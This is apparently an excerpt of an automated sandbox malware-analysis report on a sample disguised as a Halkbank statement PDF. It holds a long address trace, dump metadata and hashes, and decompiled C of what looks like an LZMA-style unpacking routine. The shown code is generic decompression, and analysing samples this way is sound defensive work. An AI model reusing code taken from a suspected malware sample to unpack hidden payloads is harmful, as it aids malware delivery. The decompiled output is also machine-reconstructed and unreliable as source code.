                                                                    0x00407151
                                                                    0x00407154
                                                                    0x00407149
                                                                    0x00407149
                                                                    0x00407149
                                                                    0x00407157
                                                                    0x0040715a
                                                                    0x0040715d
                                                                    0x0040715d
                                                                    0x00407160
                                                                    0x00407163
                                                                    0x00407166
                                                                    0x00407166
                                                                    0x00407169
                                                                    0x00407170
                                                                    0x00407175
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407203
                                                                    0x00407203
                                                                    0x00407207
                                                                    0x004075a5
                                                                    0x00000000
                                                                    0x004075a5
                                                                    0x0040720d
                                                                    0x00407210
                                                                    0x00407213
                                                                    0x00407217
                                                                    0x0040721a
                                                                    0x00407220
                                                                    0x00407222
                                                                    0x00407222
                                                                    0x00407222
                                                                    0x00407225
                                                                    0x00407228
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406df8
                                                                    0x00406df8
                                                                    0x00406dfc
                                                                    0x00407569
                                                                    0x00000000
                                                                    0x00407569
                                                                    0x00406e02
                                                                    0x00406e05
                                                                    0x00406e08
                                                                    0x00406e0c
                                                                    0x00406e0f
                                                                    0x00406e15
                                                                    0x00406e17
                                                                    0x00406e17
                                                                    0x00406e17
                                                                    0x00406e1a
                                                                    0x00406e1d
                                                                    0x00406e1d
                                                                    0x00406e20
                                                                    0x00406e23
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406e29
                                                                    0x00406e2f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406e35
                                                                    0x00406e35
                                                                    0x00406e39
                                                                    0x00406e3c
                                                                    0x00406e3f
                                                                    0x00406e42
                                                                    0x00406e45
                                                                    0x00406e46
                                                                    0x00406e49
                                                                    0x00406e4b
                                                                    0x00406e51
                                                                    0x00406e54
                                                                    0x00406e57
                                                                    0x00406e5a
                                                                    0x00406e5d
                                                                    0x00406e60
                                                                    0x00406e63
                                                                    0x00406e7f
                                                                    0x00406e82
                                                                    0x00406e85
                                                                    0x00406e88
                                                                    0x00406e8f
                                                                    0x00406e93
                                                                    0x00406e95
                                                                    0x00406e99
                                                                    0x00406e65
                                                                    0x00406e65
                                                                    0x00406e69
                                                                    0x00406e71
                                                                    0x00406e76
                                                                    0x00406e78
                                                                    0x00406e7a
                                                                    0x00406e7a
                                                                    0x00406e9c
                                                                    0x00406ea3
                                                                    0x00406ea6
                                                                    0x00000000
                                                                    0x00406eac
                                                                    0x00000000
                                                                    0x00406eac
                                                                    0x00000000
                                                                    0x00406eb1
                                                                    0x00406eb1
                                                                    0x00406eb5
                                                                    0x00407575
                                                                    0x00000000
                                                                    0x00407575
                                                                    0x00406ebb
                                                                    0x00406ebe
                                                                    0x00406ec1
                                                                    0x00406ec5
                                                                    0x00406ec8
                                                                    0x00406ece
                                                                    0x00406ed0
                                                                    0x00406ed0
                                                                    0x00406ed0
                                                                    0x00406ed3
                                                                    0x00406ed6
                                                                    0x00406ed6
                                                                    0x00406ed6
                                                                    0x00406edc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406ede
                                                                    0x00406ee1
                                                                    0x00406ee4
                                                                    0x00406ee7
                                                                    0x00406eea
                                                                    0x00406eed
                                                                    0x00406ef0
                                                                    0x00406ef3
                                                                    0x00406ef6
                                                                    0x00406ef9
                                                                    0x00406efc
                                                                    0x00406f14
                                                                    0x00406f17
                                                                    0x00406f1a
                                                                    0x00406f1d
                                                                    0x00406f1d
                                                                    0x00406f20
                                                                    0x00406f24
                                                                    0x00406f26
                                                                    0x00406efe
                                                                    0x00406efe
                                                                    0x00406f06
                                                                    0x00406f0b
                                                                    0x00406f0d
                                                                    0x00406f0f
                                                                    0x00406f0f
                                                                    0x00406f29
                                                                    0x00406f30
                                                                    0x00406f33
                                                                    0x00000000
                                                                    0x00406f35
                                                                    0x00000000
                                                                    0x00406f35
                                                                    0x00406f33
                                                                    0x00406f3a
                                                                    0x00406f3a
                                                                    0x00406f3a
                                                                    0x00406f3a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406f75
                                                                    0x00406f75
                                                                    0x00406f79
                                                                    0x00407581
                                                                    0x00000000
                                                                    0x00407581
                                                                    0x00406f7f
                                                                    0x00406f82
                                                                    0x00406f85
                                                                    0x00406f89
                                                                    0x00406f8c
                                                                    0x00406f92
                                                                    0x00406f94
                                                                    0x00406f94
                                                                    0x00406f94
                                                                    0x00406f97
                                                                    0x00406f9a
                                                                    0x00406f9a
                                                                    0x00406fa0
                                                                    0x00406f3e
                                                                    0x00406f3e
                                                                    0x00406f41
                                                                    0x00000000
                                                                    0x00406f41
                                                                    0x00406fa2
                                                                    0x00406fa2
                                                                    0x00406fa5
                                                                    0x00406fa8
                                                                    0x00406fab
                                                                    0x00406fae
                                                                    0x00406fb1
                                                                    0x00406fb4
                                                                    0x00406fb7
                                                                    0x00406fba
                                                                    0x00406fbd
                                                                    0x00406fc0
                                                                    0x00406fd8
                                                                    0x00406fdb
                                                                    0x00406fde
                                                                    0x00406fe1
                                                                    0x00406fe1
                                                                    0x00406fe4
                                                                    0x00406fe8
                                                                    0x00406fea
                                                                    0x00406fc2
                                                                    0x00406fc2
                                                                    0x00406fca
                                                                    0x00406fcf
                                                                    0x00406fd1
                                                                    0x00406fd3
                                                                    0x00406fd3
                                                                    0x00406fed
                                                                    0x00406ff4
                                                                    0x00406ff7
                                                                    0x00000000
                                                                    0x00406ff9
                                                                    0x00000000
                                                                    0x00406ff9
                                                                    0x00000000
                                                                    0x00407286
                                                                    0x00407286
                                                                    0x0040728a
                                                                    0x004075b1
                                                                    0x00000000
                                                                    0x004075b1
                                                                    0x00407290
                                                                    0x00407293
                                                                    0x00407296
                                                                    0x0040729a
                                                                    0x0040729d
                                                                    0x004072a3
                                                                    0x004072a5
                                                                    0x004072a5
                                                                    0x004072a5
                                                                    0x004072a8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407056
                                                                    0x00407056
                                                                    0x00407059
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407395
                                                                    0x00407399
                                                                    0x004073bb
                                                                    0x004073be
                                                                    0x004073c8
                                                                    0x004073cb
                                                                    0x004073cb
                                                                    0x00000000
                                                                    0x004073cb
                                                                    0x0040739b
                                                                    0x0040739e
                                                                    0x004073a2
                                                                    0x004073a5
                                                                    0x004073a5
                                                                    0x004073a8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407452
                                                                    0x00407456
                                                                    0x00407474
                                                                    0x00407474
                                                                    0x00407474
                                                                    0x0040747b
                                                                    0x00407482
                                                                    0x00407489
                                                                    0x00407489
                                                                    0x00000000
                                                                    0x00407489
                                                                    0x00407458
                                                                    0x0040745b
                                                                    0x0040745e
                                                                    0x00407461
                                                                    0x00407468
                                                                    0x004073ac
                                                                    0x004073ac
                                                                    0x004073af
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407543
                                                                    0x00407546
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040717d
                                                                    0x0040717f
                                                                    0x00407186
                                                                    0x00407187
                                                                    0x00407189
                                                                    0x0040718c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407194
                                                                    0x00407197
                                                                    0x0040719a
                                                                    0x0040719c
                                                                    0x0040719e
                                                                    0x0040719e
                                                                    0x0040719f
                                                                    0x004071a2
                                                                    0x004071a9
                                                                    0x004071ac
                                                                    0x004071ba
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407490
                                                                    0x00407490
                                                                    0x00407493
                                                                    0x0040749a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040749f
                                                                    0x0040749f
                                                                    0x004074a3
                                                                    0x004075db
                                                                    0x00000000
                                                                    0x004075db
                                                                    0x004074a9
                                                                    0x004074ac
                                                                    0x004074af
                                                                    0x004074b3
                                                                    0x004074b6
                                                                    0x004074bc
                                                                    0x004074be
                                                                    0x004074be
                                                                    0x004074be
                                                                    0x004074c1
                                                                    0x004074c4
                                                                    0x004074c4
                                                                    0x004074c4
                                                                    0x004074c4
                                                                    0x004074c7
                                                                    0x004074c7
                                                                    0x004074cb
                                                                    0x0040752b
                                                                    0x0040752e
                                                                    0x00407533
                                                                    0x00407534
                                                                    0x00407536
                                                                    0x00407538
                                                                    0x0040753b
                                                                    0x00407447
                                                                    0x00407447
                                                                    0x00000000
                                                                    0x00407447
                                                                    0x004074cd
                                                                    0x004074d3
                                                                    0x004074d6
                                                                    0x004074d9
                                                                    0x004074dc
                                                                    0x004074df
                                                                    0x004074e2
                                                                    0x004074e5
                                                                    0x004074e8
                                                                    0x004074eb
                                                                    0x004074ee
                                                                    0x00407507
                                                                    0x0040750a
                                                                    0x0040750d
                                                                    0x00407510
                                                                    0x00407514
                                                                    0x00407516
                                                                    0x00407516
                                                                    0x00407517
                                                                    0x0040751a
                                                                    0x004074f0
                                                                    0x004074f0
                                                                    0x004074f8
                                                                    0x004074fd
                                                                    0x004074ff
                                                                    0x00407502
                                                                    0x00407502
                                                                    0x0040751d
                                                                    0x00407524
                                                                    0x00000000
                                                                    0x00407526
                                                                    0x00000000
                                                                    0x00407526
                                                                    0x00000000
                                                                    0x004071c2
                                                                    0x004071c5
                                                                    0x004071fb
                                                                    0x0040732b
                                                                    0x0040732b
                                                                    0x0040732b
                                                                    0x0040732b
                                                                    0x0040732e
                                                                    0x0040732e
                                                                    0x00407331
                                                                    0x00407333
                                                                    0x004075bd
                                                                    0x00000000
                                                                    0x004075bd
                                                                    0x00407339
                                                                    0x0040733c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407342
                                                                    0x00407346
                                                                    0x00407349
                                                                    0x00407349
                                                                    0x00407349
                                                                    0x00000000
                                                                    0x00407349
                                                                    0x004071c7
                                                                    0x004071c9
                                                                    0x004071cb
                                                                    0x004071cd
                                                                    0x004071d0
                                                                    0x004071d1
                                                                    0x004071d3
                                                                    0x004071d5
                                                                    0x004071d8
                                                                    0x004071db
                                                                    0x004071f1
                                                                    0x004071f6
                                                                    0x0040722e
                                                                    0x0040722e
                                                                    0x00407232
                                                                    0x0040725e
                                                                    0x00407260
                                                                    0x00407267
                                                                    0x0040726a
                                                                    0x0040726d
                                                                    0x0040726d
                                                                    0x00407272
                                                                    0x00407272
                                                                    0x00407274
                                                                    0x00407277
                                                                    0x0040727e
                                                                    0x00407281
                                                                    0x004072ae
                                                                    0x004072ae
                                                                    0x004072b1
                                                                    0x004072b4
                                                                    0x00407328
                                                                    0x00407328
                                                                    0x00407328
                                                                    0x00000000
                                                                    0x00407328
                                                                    0x004072b6
                                                                    0x004072bc
                                                                    0x004072bf
                                                                    0x004072c2
                                                                    0x004072c5
                                                                    0x004072c8
                                                                    0x004072cb
                                                                    0x004072ce
                                                                    0x004072d1
                                                                    0x004072d4
                                                                    0x004072d7
                                                                    0x004072f0
                                                                    0x004072f2
                                                                    0x004072f5
                                                                    0x004072f6
                                                                    0x004072f9
                                                                    0x004072fb
                                                                    0x004072fe
                                                                    0x00407300
                                                                    0x00407302
                                                                    0x00407305
                                                                    0x00407307
                                                                    0x0040730a
                                                                    0x0040730e
                                                                    0x00407310
                                                                    0x00407310
                                                                    0x00407311
                                                                    0x00407314
                                                                    0x00407317
                                                                    0x004072d9
                                                                    0x004072d9
                                                                    0x004072e1
                                                                    0x004072e6
                                                                    0x004072e8
                                                                    0x004072eb
                                                                    0x004072eb
                                                                    0x0040731a
                                                                    0x00407321
                                                                    0x004072ab
                                                                    0x004072ab
                                                                    0x004072ab
                                                                    0x004072ab
                                                                    0x00000000
                                                                    0x00407323
                                                                    0x00000000
                                                                    0x00407323
                                                                    0x00407321
                                                                    0x00407234
                                                                    0x00407237
                                                                    0x00407239
                                                                    0x0040723c
                                                                    0x0040723f
                                                                    0x00407242
                                                                    0x00407244
                                                                    0x00407247
                                                                    0x0040724a
                                                                    0x0040724a
                                                                    0x0040724d
                                                                    0x0040724d
                                                                    0x00407250
                                                                    0x00407257
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x00000000
                                                                    0x00407259
                                                                    0x00000000
                                                                    0x00407259
                                                                    0x00407257
                                                                    0x004071dd
                                                                    0x004071e0
                                                                    0x004071e2
                                                                    0x004071e5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406f44
                                                                    0x00406f44
                                                                    0x00406f48
                                                                    0x0040758d
                                                                    0x00000000
                                                                    0x0040758d
                                                                    0x00406f4e
                                                                    0x00406f51
                                                                    0x00406f54
                                                                    0x00406f57
                                                                    0x00406f5a
                                                                    0x00406f5d
                                                                    0x00406f60
                                                                    0x00406f62
                                                                    0x00406f65
                                                                    0x00406f68
                                                                    0x00406f6b
                                                                    0x00406f6d
                                                                    0x00406f6d
                                                                    0x00406f6d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004070cf
                                                                    0x004070cf
                                                                    0x004070d3
                                                                    0x00407599
                                                                    0x00000000
                                                                    0x00407599
                                                                    0x004070d9
                                                                    0x004070dc
                                                                    0x004070df
                                                                    0x004070e2
                                                                    0x004070e4
                                                                    0x004070e4
                                                                    0x004070e4
                                                                    0x004070e7
                                                                    0x004070ea
                                                                    0x004070ed
                                                                    0x004070f0
                                                                    0x004070f3
                                                                    0x004070f6
                                                                    0x004070f7
                                                                    0x004070f9
                                                                    0x004070f9
                                                                    0x004070f9
                                                                    0x004070fc
                                                                    0x004070ff
                                                                    0x00407102
                                                                    0x00407105
                                                                    0x00407105
                                                                    0x00407105
                                                                    0x00407108
                                                                    0x0040710a
                                                                    0x0040710a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040734c
                                                                    0x0040734c
                                                                    0x0040734c
                                                                    0x00407350
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407356
                                                                    0x00407359
                                                                    0x0040735c
                                                                    0x0040735f
                                                                    0x00407361
                                                                    0x00407361
                                                                    0x00407361
                                                                    0x00407364
                                                                    0x00407367
                                                                    0x0040736a
                                                                    0x0040736d
                                                                    0x00407370
                                                                    0x00407373
                                                                    0x00407374
                                                                    0x00407376
                                                                    0x00407376
                                                                    0x00407376
                                                                    0x00407379
                                                                    0x0040737c
                                                                    0x0040737f
                                                                    0x00407382
                                                                    0x00407385
                                                                    0x00407389
                                                                    0x0040738b
                                                                    0x0040738e
                                                                    0x00000000
                                                                    0x00407390
                                                                    0x0040710d
                                                                    0x0040710d
                                                                    0x00000000
                                                                    0x0040710d
                                                                    0x0040738e
                                                                    0x004075c3
                                                                    0x004075e5
                                                                    0x004075eb
                                                                    0x004075ed
                                                                    0x004075f4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406bf2
                                                                    0x004075fa
                                                                    0x004075fa
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                    • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                                    • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                    • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 98%
                                                                    			E00406FFE() {
                                                                    				signed int _t539;
                                                                    				unsigned short _t540;
                                                                    				signed int _t541;
                                                                    				void _t542;
                                                                    				signed int _t543;
                                                                    				signed int _t544;
                                                                    				signed int _t573;
                                                                    				signed int _t576;
                                                                    				signed int _t597;
                                                                    				signed int* _t614;
                                                                    				void* _t621;
                                                                    
                                                                    				L0:
                                                                    				while(1) {
                                                                    					L0:
                                                                    					if( *(_t621 - 0x40) != 1) {
                                                                    						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                                    						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                                    						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                                    						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                                    						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                                    						_t539 =  *(_t621 - 4) + 0x664;
                                                                    						 *(_t621 - 0x58) = _t539;
                                                                    						goto L68;
                                                                    					} else {
                                                                    						 *(__ebp - 0x84) = 8;
                                                                    						while(1) {
                                                                    							L132:
                                                                    							 *(_t621 - 0x54) = _t614;
                                                                    							while(1) {
                                                                    								L133:
                                                                    								_t540 =  *_t614;
                                                                    								_t597 = _t540 & 0x0000ffff;
                                                                    								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                    								if( *(_t621 - 0xc) >= _t573) {
                                                                    									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                    									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                    									 *(_t621 - 0x40) = 1;
                                                                    									_t541 = _t540 - (_t540 >> 5);
                                                                    									 *_t614 = _t541;
                                                                    								} else {
                                                                    									 *(_t621 - 0x10) = _t573;
                                                                    									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                    									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                    								}
                                                                    								if( *(_t621 - 0x10) >= 0x1000000) {
                                                                    									goto L139;
                                                                    								}
                                                                    								L137:
                                                                    								if( *(_t621 - 0x6c) == 0) {
                                                                    									 *(_t621 - 0x88) = 5;
                                                                    									L170:
                                                                    									_t576 = 0x22;
                                                                    									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                                    									_t544 = 0;
                                                                    									L172:
                                                                    									return _t544;
                                                                    								}
                                                                    								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                                    								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                    								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                    								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                    								L139:
                                                                    								_t542 =  *(_t621 - 0x84);
                                                                    								while(1) {
                                                                    									 *(_t621 - 0x88) = _t542;
                                                                    									while(1) {
                                                                    										L1:
                                                                    										_t543 =  *(_t621 - 0x88);
                                                                    										if(_t543 > 0x1c) {
                                                                    											break;
                                                                    										}
                                                                    										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
                                                                    											case 0:
                                                                    												if( *(_t621 - 0x6c) == 0) {
                                                                    													goto L170;
                                                                    												}
                                                                    												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                    												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                    												_t543 =  *( *(_t621 - 0x70));
                                                                    												if(_t543 > 0xe1) {
                                                                    													goto L171;
                                                                    												}
                                                                    												_t547 = _t543 & 0x000000ff;
                                                                    												_push(0x2d);
                                                                    												asm("cdq");
                                                                    												_pop(_t578);
                                                                    												_push(9);
                                                                    												_pop(_t579);
                                                                    												_t617 = _t547 / _t578;
                                                                    												_t549 = _t547 % _t578 & 0x000000ff;
                                                                    												asm("cdq");
                                                                    												_t612 = _t549 % _t579 & 0x000000ff;
                                                                    												 *(_t621 - 0x3c) = _t612;
                                                                    												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                                    												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                                    												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                                    												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                                    													L10:
                                                                    													if(_t620 == 0) {
                                                                    														L12:
                                                                    														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                                    														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                    														goto L15;
                                                                    													} else {
                                                                    														goto L11;
                                                                    													}
                                                                    													do {
                                                                    														L11:
                                                                    														_t620 = _t620 - 1;
                                                                    														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                                    													} while (_t620 != 0);
                                                                    													goto L12;
                                                                    												}
                                                                    												if( *(_t621 - 4) != 0) {
                                                                    													GlobalFree( *(_t621 - 4));
                                                                    												}
                                                                    												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                                    												 *(_t621 - 4) = _t543;
                                                                    												if(_t543 == 0) {
                                                                    													goto L171;
                                                                    												} else {
                                                                    													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                                    													goto L10;
                                                                    												}
                                                                    											case 1:
                                                                    												L13:
                                                                    												__eflags =  *(_t621 - 0x6c);
                                                                    												if( *(_t621 - 0x6c) == 0) {
                                                                    													 *(_t621 - 0x88) = 1;
                                                                    													goto L170;
                                                                    												}
                                                                    												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                    												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                                    												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                    												_t45 = _t621 - 0x48;
                                                                    												 *_t45 =  *(_t621 - 0x48) + 1;
                                                                    												__eflags =  *_t45;
                                                                    												L15:
                                                                    												if( *(_t621 - 0x48) < 4) {
                                                                    													goto L13;
                                                                    												}
                                                                    												_t555 =  *(_t621 - 0x40);
                                                                    												if(_t555 ==  *(_t621 - 0x74)) {
                                                                    													L20:
                                                                    													 *(_t621 - 0x48) = 5;
                                                                    													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                                    													goto L23;
                                                                    												}
                                                                    												 *(_t621 - 0x74) = _t555;
                                                                    												if( *(_t621 - 8) != 0) {
                                                                    													GlobalFree( *(_t621 - 8));
                                                                    												}
                                                                    												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                                    												 *(_t621 - 8) = _t543;
                                                                    												if(_t543 == 0) {
                                                                    													goto L171;
                                                                    												} else {
                                                                    													goto L20;
                                                                    												}
                                                                    											case 2:
                                                                    												L24:
                                                                    												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                                    												 *(_t621 - 0x84) = 6;
                                                                    												 *(_t621 - 0x4c) = _t562;
                                                                    												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                                    												goto L132;
                                                                    											case 3:
                                                                    												L21:
                                                                    												__eflags =  *(_t621 - 0x6c);
                                                                    												if( *(_t621 - 0x6c) == 0) {
                                                                    													 *(_t621 - 0x88) = 3;
                                                                    													goto L170;
                                                                    												}
                                                                    												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                    												_t67 = _t621 - 0x70;
                                                                    												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                                    												__eflags =  *_t67;
                                                                    												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                    												L23:
                                                                    												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                                    												if( *(_t621 - 0x48) != 0) {
                                                                    													goto L21;
                                                                    												}
                                                                    												goto L24;
                                                                    											case 4:
                                                                    												L133:
                                                                    												_t540 =  *_t614;
                                                                    												_t597 = _t540 & 0x0000ffff;
                                                                    												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                    												if( *(_t621 - 0xc) >= _t573) {
                                                                    													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                    													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                    													 *(_t621 - 0x40) = 1;
                                                                    													_t541 = _t540 - (_t540 >> 5);
                                                                    													 *_t614 = _t541;
                                                                    												} else {
                                                                    													 *(_t621 - 0x10) = _t573;
                                                                    													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                    													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                    												}
                                                                    												if( *(_t621 - 0x10) >= 0x1000000) {
                                                                    													goto L139;
                                                                    												}
                                                                    											case 5:
                                                                    												goto L137;
                                                                    											case 6:
                                                                    												__edx = 0;
                                                                    												__eflags =  *(__ebp - 0x40);
                                                                    												if( *(__ebp - 0x40) != 0) {
                                                                    													__eax =  *(__ebp - 4);
                                                                    													__ecx =  *(__ebp - 0x38);
                                                                    													 *(__ebp - 0x34) = 1;
                                                                    													 *(__ebp - 0x84) = 7;
                                                                    													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                    													L132:
                                                                    													 *(_t621 - 0x54) = _t614;
                                                                    													goto L133;
                                                                    												}
                                                                    												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                    												__esi =  *(__ebp - 0x60);
                                                                    												__cl = 8;
                                                                    												__cl = 8 -  *(__ebp - 0x3c);
                                                                    												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                    												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                    												__ecx =  *(__ebp - 0x3c);
                                                                    												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                    												__ecx =  *(__ebp - 4);
                                                                    												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                    												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                    												__eflags =  *(__ebp - 0x38) - 4;
                                                                    												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                    												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                    												if( *(__ebp - 0x38) >= 4) {
                                                                    													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                    													if( *(__ebp - 0x38) >= 0xa) {
                                                                    														_t98 = __ebp - 0x38;
                                                                    														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                    														__eflags =  *_t98;
                                                                    													} else {
                                                                    														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                    													}
                                                                    												} else {
                                                                    													 *(__ebp - 0x38) = 0;
                                                                    												}
                                                                    												__eflags =  *(__ebp - 0x34) - __edx;
                                                                    												if( *(__ebp - 0x34) == __edx) {
                                                                    													__ebx = 0;
                                                                    													__ebx = 1;
                                                                    													goto L61;
                                                                    												} else {
                                                                    													__eax =  *(__ebp - 0x14);
                                                                    													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                    													__eflags = __eax -  *(__ebp - 0x74);
                                                                    													if(__eax >=  *(__ebp - 0x74)) {
                                                                    														__eax = __eax +  *(__ebp - 0x74);
                                                                    														__eflags = __eax;
                                                                    													}
                                                                    													__ecx =  *(__ebp - 8);
                                                                    													__ebx = 0;
                                                                    													__ebx = 1;
                                                                    													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                    													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                    													goto L41;
                                                                    												}
                                                                    											case 7:
                                                                    												goto L0;
                                                                    											case 8:
                                                                    												__eflags =  *(__ebp - 0x40);
                                                                    												if( *(__ebp - 0x40) != 0) {
